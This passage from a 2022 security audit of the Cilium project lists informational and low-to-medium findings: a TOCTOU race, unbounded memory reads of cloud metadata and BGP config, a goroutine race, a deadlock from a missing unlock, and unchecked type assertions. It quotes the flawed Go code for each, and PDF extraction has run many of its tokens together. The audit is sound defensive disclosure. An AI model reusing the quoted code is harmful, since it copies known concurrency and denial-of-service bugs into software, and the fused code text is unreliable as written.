PatchConfigParams,resChanchaninterface{}) {...d.TriggerDatapathRegen(policyEnforcementChanged,\"agent configurationupdate\")}\nresChan <- NewPatchConfigOK()return}\nhttps://github.com/cilium/cilium/blob/de82f8c1a3cb92cde0f37fe627aaf1c313a37caf/daemon/cmd/policy.go#L430\nfunc(d *Daemon)policyAdd(sourceRules policyAPI.Rules,opts *policy.AddOptions, resChanchaninterface{}) {\n37Cilium security audit, 2022\n..._, err = d.policy.RuleReactionQueue.Enqueue(ev)iferr !=nil{log.WithError(err).WithField(logfields.PolicyRevision,newRev).Error(\"enqueue of RuleReactionEvent failed\")}\nreturn}\nhttps://github.com/cilium/cilium/blob/de82f8c1a3cb92cde0f37fe627aaf1c313a37caf/daemon/cmd/policy.go#L644\nfunc(d *Daemon)policyDelete(labels labels.LabelArray,reschaninterface{}) {if_, err := d.policy.RuleReactionQueue.Enqueue(ev);err !=nil{log.WithError(err).WithField(logfields.PolicyRevision, rev).Error(\"enqueueof RuleReactionEvent failed\")}iferr := d.SendNotification(monitorAPI.PolicyDeleteMessage(deleted,labels.GetModel(), rev)); err !=nil{log.WithError(err).WithField(logfields.PolicyRevision, rev).Warn(\"Failedto send policy update as monitor notification\")}\nreturn}\nhttps://github.com/cilium/cilium/blob/b1aa5374acf77a598e8f5a6d69cbc53122812d62/daemon/cmd/status.go#L1093\nfunc(d *Daemon)startStatusCollector(cleaner *daemonCleanup){...cleaner.cleanupFuncs.Add(func() {// If the KVstore state is not OK, print help foruser.ifd.statusResponse.Kvstore !=nil&&d.statusResponse.Kvstore.State != models.StatusStateOk {helpMsg :=\"cilium-agent depends on the availabilityofcilium-operator/etcd-cluster. \"+\"Check if the cilium-operator pod and etcd-clusterarerunning and do not have any \"+\"warnings or error messages.\"log.WithFields(logrus.Fields{\"status\": d.statusResponse.Kvstore.Msg,logfields.HelpMessage: helpMsg,}).Error(\"KVStore state not OK\")\n}})return}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L173\nfuncsyncCESsInLocalCache(cesStore cache.Store, manageroperations) {...log.Debug(\"Successfully synced all CESs locally\")\n38Cilium security audit, 2022\nreturn}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L196\nfunc(c *CiliumEndpointSliceController)Run(ces cache.Indexer,stopChchanstruct{}) {...gowait.Until(c.worker, c.workerLoopPeriod, stopCh)\ngofunc() {deferutilruntime.HandleCrash()}()\n<-stopCh\nreturn}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L217\nfuncsyncCESsInLocalCache(cesStore cache.Store, manageroperations) {...log.Debug(\"Successfully synced all CESs locally\")return}\nhttps://github.com/cilium/cilium/blob/e4ea0fa10af293b24fbe6b26307ec2709bb856e6/operator/pkg/ciliumendpointslice\n/manager.go#L168\nfunc(c *cesMgr)addCEPtoCES(cep *cilium_v2.CoreCiliumEndpoint,ces *cesTracker) {...// Increment the cepInsert counterces.cepInserted +=1c.insertCESInWorkQueue(ces, DefaultCESSyncTime)return}\nhttps://github.com/cilium/cilium/blob/e4ea0fa10af293b24fbe6b26307ec2709bb856e6/operator/pkg/ciliumendpointslice\n/manager.go#L367\nfunc(c *cesMgr)RemoveCEPFromCache(cepNamestring,baseDelay time.Duration) {...}else{log.WithFields(logrus.Fields{logfields.CEPName: cepName,}).Info(\"Attempted to retrieve non-existent CES,skip processing.\")}\nreturn}\n39Cilium security audit, 2022\nhttps://github.com/cilium/cilium/blob/0b7919a9d8138a42dc82f3861372c665970fd22c/pkg/alibabacloud/eni/node.go#L\n86\nfunc(n *Node)PopulateStatusFields(resource *v2.CiliumNode){resource.Status.AlibabaCloud.ENIs =map[string]eniTypes.ENI{}\nn.manager.ForeachInstance(n.node.InstanceID(),func(instanceID, interfaceIDstring, rev ipamTypes.InterfaceRevision)error{e, ok := rev.Resource.(*eniTypes.ENI)ifok {resource.Status.AlibabaCloud.ENIs[interfaceID] =*e.DeepCopy()}returnnil})\nreturn}\nhttps://github.com/cilium/cilium/blob/c5cbf403dbe355ecbb80dfc8d7a8ed4da45c43bd/pkg/aws/eni/node.go#L105\nfunc(n *Node)PopulateStatusFields(k8sObj *v2.CiliumNode){k8sObj.Status.ENI.ENIs =map[string]eniTypes.ENI{}\nn.manager.ForeachInstance(n.node.InstanceID(),func(instanceID, interfaceIDstring, rev ipamTypes.InterfaceRevision)error{e, ok := rev.Resource.(*eniTypes.ENI)ifok {k8sObj.Status.ENI.ENIs[interfaceID] = *e.DeepCopy()}returnnil})\nreturn}\nhttps://github.com/cilium/cilium/blob/f3a4c4d204cf84af3d40f4782aa68e7c2da98440/pkg/endpoint/events.go#L68\nfunc(ev *EndpointRegenerationEvent)Handle(reschaninterface{}) {...res <- &EndpointRegenerationResult{err: err,}return}\nhttps://github.com/cilium/cilium/blob/f3a4c4d204cf84af3d40f4782aa68e7c2da98440/pkg/endpoint/events.go#L185\nfunc(ev *EndpointNoTrackEvent)Handle(reschaninterface{}){...res <- &EndpointRegenerationResult{err:nil,\n40Cilium security audit, 2022\n}return}\nhttps://github.com/cilium/cilium/blob/f3a4c4d204cf84af3d40f4782aa68e7c2da98440/pkg/endpoint/events.go#L251\nfunc(ev *EndpointPolicyVisibilityEvent)Handle(reschaninterface{}) {...e.visibilityPolicy = nvpres <- &EndpointRegenerationResult{err:nil,}return}\nhttps://github.com/cilium/cilium/blob/c112a3e59dcc988cf3a9901b48bce9583cfb3581/pkg/ipam/allocator/podcidr/podc\nidr.go#L420\nfunc(n *NodesPodCIDRManager)Delete(node *v2.CiliumNode){...n.ciliumNodesToK8s[node.Name] = &ciliumNodeK8sOp{op: k8sOpDelete,}n.k8sReSync.Trigger()return}\nhttps://github.com/cilium/cilium/blob/295d32957db4defae2c1dc594ff9b284c6513d4f/pkg/maps/lbmap/ipv4.go#L224\nfunc(in *pad2uint8)DeepCopyInto(out *pad2uint8){copy(out[:], in[:])return}\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/pkg/maps/lxcmap/lxcmap.go#L11\n3\nfunc(in *pad4uint32)DeepCopyInto(out *pad4uint32){copy(out[:], in[:])return}\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/tuple/tuple.go#L42\nfunc(in *buff256uint8)DeepCopyInto(out *buff256uint8){copy(out[:], in[:])return}\nhttps://github.com/cilium/cilium/blob/5fc05ac07597ed651a8ccb2e59dc73691ec2caec/pkg/types/ipv4.go#L32\nfunc(v4 *IPv4)DeepCopyInto(out *IPv4) {copy(out[:], v4[:])return\n41Cilium security audit, 2022\n}\nhttps://github.com/cilium/cilium/blob/5fc05ac07597ed651a8ccb2e59dc73691ec2caec/pkg/types/ipv6.go#L30\nfunc(v6 *IPv6)DeepCopyInto(out *IPv6) {copy(out[:], v6[:])return}\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/types/macaddr.go#L24\nfunc(addr *MACAddr)DeepCopyInto(out *MACAddr) {copy(out[:], addr[:])return}\n42Cilium security audit, 2022\n11: Redundant imports\nOverall severity:\nInformational\nID:\nADA-CIL-11\nLocation:\nSeveral packages\nCWE:\n●\nCWE-1041: Use of Redundant Code\nDescription\nCilium imports the same library twice in the same file these places of the source tree:\nFile\nDouble import\ndaemon/cmd/daemon.gogithub.com/cilium/cilium/pkg/k8s/client\ndaemon/cmd/daemon_main.gogithub.com/cilium/cilium/pkg/wireguard/agent\noperator/cmd/flags.gogithub.com/cilium/cilium/pkg/option\noperator/pkg/ciliumendpointslice/endpointslice.gogithub.com/cilium/cilium/pkg/k8s/apis/cilium.io/v2alpha1\npkg/k8s/watchers/cilium_endpoint_slice.gogithub.com/cilium/cilium/pkg/k8s/apis/cilium.io/v2alpha1\npkg/k8s/watchers/cilium_network_policy.gogithub.com/cilium/cilium/pkg/k8s/utils\npkg/nodediscovery/nodediscovery.gogithub.com/cilium/cilium/pkg/node/types\npkg/redirectpolicy/redirectpolicy.gogithub.com/cilium/cilium/pkg/loadbalancer\npkg/service/service.gogithub.com/cilium/cilium/pkg/datapath/types\n43Cilium security audit, 2022\n12: Redundant function parameters\nOverall severity:\nInformational\nID:\nADA-CIL-12\nLocation:\nSeveral packages\nCWE\n●\nCWE-1041: Use of Redundant Code\nDescription\nThis issue lists the places in which Cilium passes a function parameter that remains unused in the\nfunction body rendering the parameter redundant.\nLatest commit of this check:b8a6791299083d9888819d03f458ecd1942abf81\nFile\nAPI\nParam name\napi/v1/server/configure_cilium_api.goconfigureServerscheme, addr\ndaemon/cmd/ciliumendpoints.go(*Daemon).deleteCiliumEndpointeps\ndaemon/cmd/daemon_main.go(*Daemon).instantiateBGPControlPlanectx\ndaemon/cmd/hubble.gogetHubbleEventBufferCapacitylogger\noperator/pkg/lbipam/lbipam.go(*LBIPAM).poolOnUpsertk\noperator/pkg/lbipam/lbipam.go(*LBIPAM).poolOnDeletek\noperator/pkg/lbipam/lbipam.go(*LBIPAM).svcOnUpsertk\noperator/pkg/lbipam/lbipam.go(*LBIPAM).svcOnDeletek\npkg/alibabacloud/eni/node.go(*Node).getSecurityGroupIDsctx\npkg/aws/eni/migration.go(*InterfaceDB).fetchFromK8sname\npkg/aws/eni/node.go(*Node).getSecurityGroupIDsctx\npkg/bgp/manager/metallb.gonewMetalLBControllerctx\npkg/bgp/speaker/metallb.gonewMetalLBSpeakerctx\npkg/bgpv1/gobgp/routermgr.go(*BGPRouterManager).withdrawctx\npkg/bgpv1/gobgp/workdiff.go(*reconcileDiff).withdrawDiffpolicy\npkg/bpf/map_linux.go(*Map).deleteAllMapEventerr\npkg/bpf/map_register_linux.gounregisterMapm\npkg/datapath/ipcache/listener.go(*BPFListener).garbageCollectctx\npkg/datapath/iptables/iptables.go(*IptablesManager).installMasqueradeRulesifName\n44Cilium security audit, 2022\npkg/datapath/linux/routing/migrate.go(*migrator).copyRoutesfrom\npkg/datapath/loader/loader.go(*Loader).replaceNetworkDatapathinterfaces\npkg/egressgateway/net.goaddEgressIpRuleegressIP\npkg/ipam/allocator/podcidr/podcidr.gogetCIDRAllocatorsInfonetTypes\npkg/ipam/node_manager.go(*NodeManager).resyncNodectx\npkg/k8s/apis/cilium.io/client/register.gowaitForV1CRDcrdName\npkg/k8s/apis/cilium.io/client/v1beta1.gowaitForV1beta1CRDcrdName\npkg/k8s/identitybackend/identity.go(*crdBackend).getctx\npkg/k8s/identitybackend/identity.go(*crdBackend).getByIdctx\npkg/k8s/watchers/cilium_clusterwide_envoy_config.go(*K8sWatcher).ciliumClusterwideEnvoyConfigInitclientset\npkg/k8s/watchers/endpoint.go(*K8sWatcher).updateK8sEndpointV1oldEP\npkg/k8s/watchers/service.go(*K8sWatcher).updateK8sServiceV1oldSvc\npkg/k8s/watchers/watcher.go(*K8sWatcher).enableK8sWatchersctx\npkg/k8s/watchers/watcher.go(*K8sWatcher).delK8sSVCsse\npkg/monitor/agent/agent.go(*Agent).processPerfRecordscopedLog\npkg/monitor/api/drop.goextendedReasonreason\npkg/monitor/format/format.go(*MonitorFormatter).policyVerdictEventsprefix\npkg/monitor/format/format.go(*MonitorFormatter).recorderCaptureEventsprefix\npkg/monitor/format/format.go(*MonitorFormatter).logRecordEventsprefix\npkg/monitor/format/format.go(*MonitorFormatter).agentEventsprefix\npkg/node/address.gochooseHostIPsToRestoreipv6\npkg/pidfile/pidfile.gokillpidfile\npkg/policy/selectorcache.go(*selectorManager).removeUserdnsProxy\npkg/proxy/dns.go(*dnsRedirect).setRuleswg\nproxylib/proxylib/policymap.gonewPortNetworkPolicyRulesport\n45Cilium security audit, 2022\n13: TOCTOU race condition in sockopsbpftoolLoad\nOverall severity:\nLow\nID:\nADA-CIL-13\nLocation:pkg/sockops\nCWE:\n●\nCWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition\nFix:\nhttps://github.com/cilium/cilium/pull/23606\nDescription\nA TOCTOU race condition exists in sockopsbpftoolLoad\n.\nhttps://github.com/cilium/cilium/blob/473e75f4d49b6e47880833e041c946b5446a145d/pkg/sockops/sockops.go#L100\nfuncbpftoolLoad(bpfObjectstring, bpfFsFilestring)error{...maps, err := os.ReadDir(filepath.Join(bpf.GetMapRoot(),\"/tc/globals/\"))iferr !=nil{returnerr}\nfor_, f :=rangemaps {// Ignore all backing filesifstrings.HasPrefix(f.Name(),\"..\") {continue}\nuse :=func()bool{for_, n :=rangesockopsMaps {iff.Name() == n {returntrue}}returnfalse}()\nif!use {continue}\nmapString := []string{\"map\",\"name\", f.Name(),\"pinned\",filepath.Join(bpf.GetMapRoot(),\"/tc/globals/\", f.Name())}mapArgList =append(mapArgList, mapString...)}\nargs := []string{\"-m\",\"prog\",\"load\", bpfObject,bpffs}args =append(args, mapArgList...)log.WithFields(logrus.Fields{\"bpftool\": prog,\"args\": args,}).Debug(\"Load BPF Object:\")out, err := exec.Command(prog, args...).CombinedOutput()\n46Cilium security audit, 2022\niferr !=nil{returnfmt.Errorf(\"Failed to load %s: %s: %s\", bpfObject,err, out)}returnnil}\nIn this API there is a check whether a map should be used. If it should, then the map is referenced\nby name and passed to the bp\u0000ool. A race condition exists in that the map could be replaced a\u0000er\nthe check has occurred and before bp\u0000ool is invoked.\nThe specific part that has the race condition is this:\nuse :=func()bool{for_, n :=rangesockopsMaps {iff.Name() == n {returntrue}}returnfalse}()\nif!use {continue}\nmapString := []string{\"map\",\"name\", f.Name(),\"pinned\",filepath.Join(bpf.GetMapRoot(),\"/tc/globals/\", f.Name())}mapArgList =append(mapArgList, mapString...)\nThe level of exploitability of this issue is low but is included here to highlight that there currently is\nnot a guarantee that the map that Cilium loads is the map that it - or the user - expects to load.\n47Cilium security audit, 2022\n14: Level of trust for input from cloud providers is too high\nOverall severity:\nLow\nID:\nADA-CIL-14\nLocation:\n●pkg/azure\n●pkg/alibabacloud\n●pkg/aws\nCWE:\n●\nCWE-1041: Use of Redundant Code\nFix:\nhttps://github.com/cilium/cilium/pull/22602\nDescription\nWhen Cilium fetches metadata from a 3rd party, Azure IMS, Alibaba Cloud, AWS, the response is\nread entirely into memory without enforcing an upper limit. Since Cilium does not control the\nbehavior of these 3rd-party APIs, it cannot ensure that the size of the response will always be\nwithin reasonable limits. If an attacker finds a way to generate a response that contains a large\nbody, a Denial-of-Service scenario would exist, when Cilium reads the entire response into\nmemory.\nThe scenario exists the following places:\nAzure IMS\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/azure/ap\ni/metadata.go#L39\nfuncgetMetadataString(ctx context.Context, pathstring)(string, error) {client := &http.Client{Timeout: time.Second *10,}url := fmt.Sprintf(\"%s/%s\", metadataURL, path)req, err := http.NewRequestWithContext(ctx, http.MethodGet, url,nil)iferr !=nil{return\"\",nil}\nquery := req.URL.Query()query.Add(\"api-version\", metadataAPIVersion)query.Add(\"format\",\"text\")\nreq.URL.RawQuery = query.Encode()req.Header.Add(\"Metadata\",\"true\")\nresp, err := client.Do(req)iferr !=nil{return\"\", err}deferfunc() {\n48Cilium security audit, 2022\niferr := resp.Body.Close(); err !=nil{log.WithError(err).Errorf(\"Failed to close bodyfor request %s\",url)}}()\nrespBytes, err := io.ReadAll(resp.Body)iferr !=nil{return\"\", err}\nreturnstring(respBytes),nil}\nAlibaba Cloud\nhttps://github.com/cilium/cilium/blob/181b030b0dd868091cc00d0bd8b1ce40688d63ae/pkg/aliba\nbacloud/metadata/metadata.go#L50\nfuncgetMetadata(ctx context.Context, pathstring)(string, error) {client := &http.Client{Timeout: time.Second *10,}url := fmt.Sprintf(\"%s/%s\", metadataURL, path)req, err := http.NewRequestWithContext(ctx, http.MethodGet, url,nil)iferr !=nil{return\"\", err}\nresp, err := client.Do(req)iferr !=nil{return\"\", err}\nifresp.StatusCode != http.StatusOK {return\"\", fmt.Errorf(\"metadata service returnedstatus code %d\",resp.StatusCode)}\ndeferresp.Body.Close()respBytes, err := io.ReadAll(resp.Body)iferr !=nil{return\"\", err}\nreturnstring(respBytes),nil}\nAWS\nhttps://github.com/cilium/cilium/blob/c5cbf403dbe355ecbb80dfc8d7a8ed4da45c43bd/pkg/aws/\nmetadata/metadata.go#L24\nfuncgetMetadata(client *imds.Client, pathstring)(string, error) {res, err := client.GetMetadata(context.TODO(), &imds.GetMetadataInput{Path: path,\n49Cilium security audit, 2022\n})iferr !=nil{return\"\", fmt.Errorf(\"unable to retrieve AWS metadata%s: %w\", path, err)}\ndeferres.Content.Close()value, err := io.ReadAll(res.Content)iferr !=nil{return\"\", fmt.Errorf(\"unable to read response contentfor AWS metadata%q: %w\", path, err)}\nreturnstring(value), err}\n50Cilium security audit, 2022\n15: BGP configuration file is read entirely into memory\nOverall severity\nLow\nID:\nADA-CIL-15\nLocation:pkg/bgp\nCWE:\n●\nCWE-1041: Use of Redundant Code\nFix:\nhttps:/ /github.com/cilium/cilium/pull/22602\nDescription\nThe BGP config parser reads a config file entirely into memory. This could create a scenario\nwhereby a malicious user intentionally - or a genuine user unintentionally - could parse a config file\nthat is larger than the available memory on the memory creating Denial-of-Service of the machine.\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/bgp/conf\nig/config.go#L16\nfuncParse(r io.Reader) (*metallbcfg.Config, error){buf, err := io.ReadAll(r)iferr !=nil{returnnil, fmt.Errorf(\"failed to read MetalLB config:%w\", err)}config, err := metallbcfg.Parse(buf)iferr !=nil{returnnil, fmt.Errorf(\"failed to parse MetalLBconfig: %w\", err)}returnconfig,nil}\n51Cilium security audit, 2022\n16: Race condition when starting operator apiserver\nOverall severity:\nLow\nID:\nADA-CIL-16\nLocation:\nOperator apiserver\nCWE:\n●\nCWE-362: Concurrent Execution using Shared Resource with \nImproper Synchronization ('Race Condition')\nDescription\nA race condition exists when starting the oprerator apiserver.StartServer()\nloops through all\naddresses ins.listenAddres\nand starts a goroutine\nin each iteration. Each goroutine refers to\naddr which is not passed to the goroutine. As such, the addr in each goroutine may not be the addr\nof the given loop iteration.\nThis is purely a cosmetic issue with the highest impact of causing confusion when going through\nthe logs.\nfunc(s *Server)StartServer()error{errs :=make(chanerror,1)nServers :=0\n// Since we are opening this on localhost only, weneed to make sure// we can open for both v4 and v6 localhost. In casethe user is running// v4-only or v6-only.for_,addr:=ranges.listenAddrs {ifaddr ==\"\"{continue}nServers++\nmux := http.NewServeMux()\n// Index handler is the the handler for Open-APIrouter.mux.Handle(\"/\", s.Server.GetHandler())// Create a custom handler for /healthz as an aliasto /v1/healthz. A httpmux// is required for this because open-api spec doesnot allow multiple basepaths// to be specified.mux.HandleFunc(\"/healthz\",func(rw http.ResponseWriter,_ *http.Request) {resp := s.healthzHandler.Handle(operator.GetHealthzParams{})resp.WriteResponse(rw, runtime.TextProducer())})\nsrv := &http.Server{Addr: addr,Handler: mux,}\n52Cilium security audit, 2022\nerrCh :=make(chanerror,1)\nlc := net.ListenConfig{Control: setsockoptReuseAddrAndPort}ln, err := lc.Listen(context.Background(),\"tcp\",addr)iferr !=nil{log.WithError(err).Fatalf(\"Unable to listen on%s for healthzapiserver\", addr)}\ngofunc() {err := srv.Serve(ln)iferr !=nil{// If the error is due to the server being shutdown,thensend nil to// the server errors channel.iferrors.Is(err, http.ErrServerClosed) {log.WithField(\"address\",addr).Debug(\"OperatorAPIserver closed\")errs <-nil}else{errCh <- errerrs <- err}}}()\ngofunc() {select{case<-s.shutdownSignal:iferr := srv.Shutdown(context.Background());err !=nil{log.WithError(err).Error(\"apiserver shutdown\")}caseerr := <-errCh:log.WithError(err).Warn(\"Unable to start operatorAPIserver\")}}()\nlog.Infof(\"Starting apiserver on address %s\", addr)}\nvarretErr errorforerr :=rangeerrs {iferr !=nil{retErr = err}\nnServers--ifnServers ==0{returnretErr}}\nreturnnil}\n53Cilium security audit, 2022\n17: Bad code practice: Identical identifier of import and variable\nOverall severity:\nLow\nID:\nADA-CIL-17\nLocation:pkg/egressgateway\nCWE:\n●\nCWE-1109: Use of Same Variable for Multiple Purposes\nDescription\nOverwriting import identifiers could result in undefined behavior and should be avoided. In the\nfollowing part of Cilium, a variable is assigned to an identifier that also refers to an imported\npackage.\nhttps://github.com/cilium/cilium/blob/710297f229480bbd4fc52f39ea68a6eeb333c9d4/pkg/egressg\nateway/manager.go#L80\nfunc(manager *Manager)getIdentityLabels(securityIdentityuint32) (labels.Labels, error){identityCtx, cancel := context.WithTimeout(context.Background(),option.Config.KVstoreConnectivityTimeout)defercancel()iferr := manager.identityAllocator.WaitForInitialGlobalIdentities(identityCtx);err !=nil{returnnil, fmt.Errorf(\"failed to wait for initialglobal identities: %v\",err)}\nidentity:= manager.identityAllocator.LookupIdentityByID(identityCtx,identity.NumericIdentity(securityIdentity))ifidentity ==nil{returnnil, fmt.Errorf(\"identity %d not found\",securityIdentity)}returnidentity.Labels,nil}\nWhere this package is imported:github.com/cilium/cilium/pkg/identity\n.\nRecommendations\nChange the variable identifier.\n54Cilium security audit, 2022\n18: Deadlock from locked mutex\nOverall severity:\nMedium\nID:\nADA-CIL-18\nLocation:pkg/envoy\nCWE:\n●\nCWE-667: Improper Locking\nFix:\nhttps://github.com/cilium/cilium/pull/23077\nDescription\nGo has two common tools when dealing with concurrency: Mutual exclusion - also known as\nmutex, and channels. A mutex is a low-level tool to protect against race conditions. A mutex can be\neither locked or unlocked. A mutex can perform two operations: Lock and unlock. Each operation is\natomic, meaning that a process has to wait for a locked process to be unlocked until it itself can\nlock. If a process fails to unlock, other processes may wait for an unlock that does not happen\nresulting in a deadlock.\nCilium has a deadlock error in the envoy package from a missing mutex unlock before returning in\ncase of an invalidlistenerConfig\n:\nhttps://github.com/cilium/cilium/blob/79c6f5725372b52c9877a9bde1249da039948649/pkg/envoy/server.go#L576\niferr := listenerConfig.Validate(); err !=nil{log.Errorf(\"Envoy: Could not validate Listener (%s):%s\", err,listenerConfig.String())return}\nRecommendation\nUnlock thes.mutex\nbefore returning.\n55Cilium security audit, 2022\n19: Possible type confusions\nOverall severity:\nLow\nID:\nADA-CIL-19\nLocation:\nSeveral packages\nCWE:\n●\nCWE-704: Incorrect Type Conversion or Cast\n●\nCWE-843: Access of Resource Using Incompatible Type ('Type \nConfusion')\nDescription\nType confusions occur when a variable is assumed to be of a type that it is not. They are usually\nmore severe in memory-unsafe languages than in memory-safe languages like Go and are\nrecoverable in Go which only rarely makes them critical. However, there have been previous cases\nof type confusions in open source Go source code having security implications such as\nGHSA-qq97-vm5h-rrhg\n. In addition, Cilium has had issues\nin the past with panics from type\nconfusions:\nhttps://github.com/cilium/cilium/pull/171\n.\nIdeally all type assertions should either be checked or a unit test should demonstrate that the given\ncast is safe. Checking all casts would ensure that all casts are safe, but since this may unnecessarily\nbloat the production code base this may not be the best avenue. Instead, a unit test could catch\ntype confusions from being introduced from unchecked type assertions when the code base\nchanges.\nBelow we list the type assertions identified during this audit.\nhttps://github.com/cilium/cilium/blob/fd50b8d3b9684e0e88139e5776bd68ef15a344d0/cilium/cmd/bpf_ct_list.go#L122-\nL162\nfuncdumpCt(maps []interface{}, args ...interface{}){entries :=make([]ctmap.CtMapRecord,0)eID := args[0]\nfor_, m :=rangemaps {path, err :=m.(ctmap.CtMap).Path()iferr ==nil{err =m.(ctmap.CtMap).Open()}iferr !=nil{ifos.IsNotExist(err) {msg :=\"Unable to open %s: %s.\"ifeID.(string) !=\"global\"{msg =\"Unable to open %s: %s: please try using\\\"cilium bpf ct list global\\\".\"}fmt.Fprintf(os.Stderr, msg+\" Skipping.\\n\", path,err)continue\n56Cilium security audit, 2022\n}Fatalf(\"Unable to open %s: %s\", path, err)}deferm.(ctmap.CtMap).Close()// Plain output prints immediately, JSON/YAML outputholds until it// collected values from all maps to have one consistentobjectifcommand.OutputOption() {callback :=func(key bpf.MapKey, value bpf.MapValue){record := ctmap.CtMapRecord{Key:key.(ctmap.CtKey),Value:*value.(*ctmap.CtEntry)}entries =append(entries, record)}iferr =m.(ctmap.CtMap).DumpWithCallback(callback);err !=nil{Fatalf(\"Error while collecting BPF map entries:%s\", err)}}else{doDumpEntries(m.(ctmap.CtMap))}}ifcommand.OutputOption() {iferr := command.PrintOutput(entries); err !=nil{os.Exit(1)}}}\nhttps://github.com/cilium/cilium/blob/d5227f1baed6eb56865dc08275e6560bfff27cce/cilium/cmd/bpf_ipcache_get.go#L\n52\nv :=value.([]string)iflen(v) ==0{fmt.Printf(\"Unable to retrieve identity for LPMentry %s\\n\", arg)os.Exit(1)}\nhttps://github.com/cilium/cilium/blob/c6e53ea42bccbe8507e7df0f49319a2a853c054e/cilium/cmd/bpf_lb_list.go#L71-L8\n8\nparseBackendEntry :=func(key bpf.MapKey, value bpf.MapValue){id :=key.(lbmap.BackendKey).GetID()backendMap[id] = value.DeepCopyMapValue().(lbmap.BackendValue).ToHost()}iferr := lbmap.Backend4MapV3.DumpWithCallbackIfExists(parseBackendEntry);err !=nil{Fatalf(\"Unable to dump IPv4 backends table: %s\",err)}iferr := lbmap.Backend6MapV3.DumpWithCallbackIfExists(parseBackendEntry);err !=nil{Fatalf(\"Unable to dump IPv6 backends table: %s\",err)}\nparseSVCEntry :=func(key bpf.MapKey, value bpf.MapValue){varentrystring\n57Cilium security audit, 2022\nsvcKey :=key.(lbmap.ServiceKey)svcVal :=value.(lbmap.ServiceValue).ToHost()svc := svcKey.String()svcKey = svcKey.ToHost()\nhttps://github.com/cilium/cilium/blob/fd50b8d3b9684e0e88139e5776bd68ef15a344d0/cilium/cmd/bpf_nat_list.go#L60-\nL68\nifcommand.OutputOption() {callback :=func(key bpf.MapKey, value bpf.MapValue){record := nat.NatMapRecord{Key:key.(nat.NatKey),Value:value.(nat.NatEntry)}entries =append(entries, record)}iferr =m.(nat.NatMap).DumpWithCallback(callback);err !=nil{Fatalf(\"Error while collecting BPF map entries:%s\", err)}}else{out, err :=m.(nat.NatMap).DumpEntries()\nhttps://github.com/cilium/cilium/blob/e4d9dd21cfcb396bfe38893547bfe6ed578f7292/cilium/cmd/bpf_recorder_list.go#\nL57-L65\nifcommand.OutputOption() {callback :=func(key bpf.MapKey, value bpf.MapValue){record := recorder.MapRecord{Key:key.(recorder.RecorderKey), Value:value.(recorder.RecorderEntry)}entries =append(entries, record)}iferr = m.DumpWithCallback(callback); err !=nil{Fatalf(\"Error while collecting BPF map entries:%s\", err)}}else{\nhttps://github.com/cilium/cilium/blob/677750f8a3f098be7da6bb7b5a94c240e6633b36/operator/cmd/cilium_node.go#L\n328\nif_, ok := key.(ciliumNodeManagerQueueSyncedKey);ok {close(s.ciliumNodeManagerQueueSynced)returntrue}\nerr := syncHandler(key.(string))iferr ==nil{// If err is nil we can forget it from the queue,if it is not nil// the queue handler will retry to process thiskey until it succeeds.queue.Forget(key)returntrue}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L203\n58Cilium security audit, 2022\nfuncsyncCESsInLocalCache(cesStore cache.Store, manager operations) {for_, obj :=rangecesStore.List() {ces :=obj.(*v2alpha1.CiliumEndpointSlice)// If CES is already cached locally, do nothing.\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L236\nfunc(c *CiliumEndpointSliceController)processNextWorkItem()bool{cKey, quit := c.queue.Get()ifquit {returnfalse}deferc.queue.Done(cKey)\nerr := c.syncCES(cKey.(string))c.handleErr(err, cKey)\nreturntrue}\nhttps://github.com/cilium/cilium/blob/c147bbd3211f0ef19eb13f4daab07e100e6b72d5/operator/pkg/ciliumendpointslic\ne/endpointslice.go#L278\nobj, exists, err := c.ciliumEndpointSliceStore.GetByKey(key)iferr ==nil&& exists {ces :=obj.(*v2alpha1.CiliumEndpointSlice)// Delete the CES, only if CEP count is zero inlocal copy of CES andapi-server copy of CES,// else Update the CESiflen(ces.Endpoints) ==0&& c.Manager.getCEPCountInCES(key)==0{iferr := c.reconciler.reconcileCESDelete(key);err !=nil{returnerr}}else{iferr := c.reconciler.reconcileCESUpdate(key);err !=nil{returnerr}}}\nhttps://github.com/cilium/cilium/blob/e3dfed84dc69990bbb68e9a181e984ec83dbe233/operator/pkg/gateway-api/contr\noller.go#L191-L222\nfunconlyStatusChanged()predicate.Predicate{option := cmpopts.IgnoreFields(metav1.Condition{},\"LastTransitionTime\")returnpredicate.Funcs{UpdateFunc:func(e event.UpdateEvent)bool{switche.ObjectOld.(type) {case*gatewayv1beta1.GatewayClass:o, _ := e.ObjectOld.(*gatewayv1beta1.GatewayClass)n, ok := e.ObjectNew.(*gatewayv1beta1.GatewayClass)if!ok {returnfalse}\n59Cilium security audit, 2022\nreturn!cmp.Equal(o.Status, n.Status, option)case*gatewayv1beta1.Gateway:o, _ := e.ObjectOld.(*gatewayv1beta1.Gateway)n, ok := e.ObjectNew.(*gatewayv1beta1.Gateway)if!ok {returnfalse}return!cmp.Equal(o.Status, n.Status, option)case*gatewayv1beta1.HTTPRoute:o, _ := e.ObjectOld.(*gatewayv1beta1.HTTPRoute)n, ok := e.ObjectNew.(*gatewayv1beta1.HTTPRoute)if!ok {returnfalse}return!cmp.Equal(o.Status, n.Status, option)default:returnfalse}},}}\nhttps://github.com/cilium/cilium/blob/d0a43aa05ee39b884ff9e87318e2a6aebd5ca98f/operator/pkg/gateway-api/httpro\nute.go#L44-L46\nfunc(rawObj client.Object) []string{hr, ok 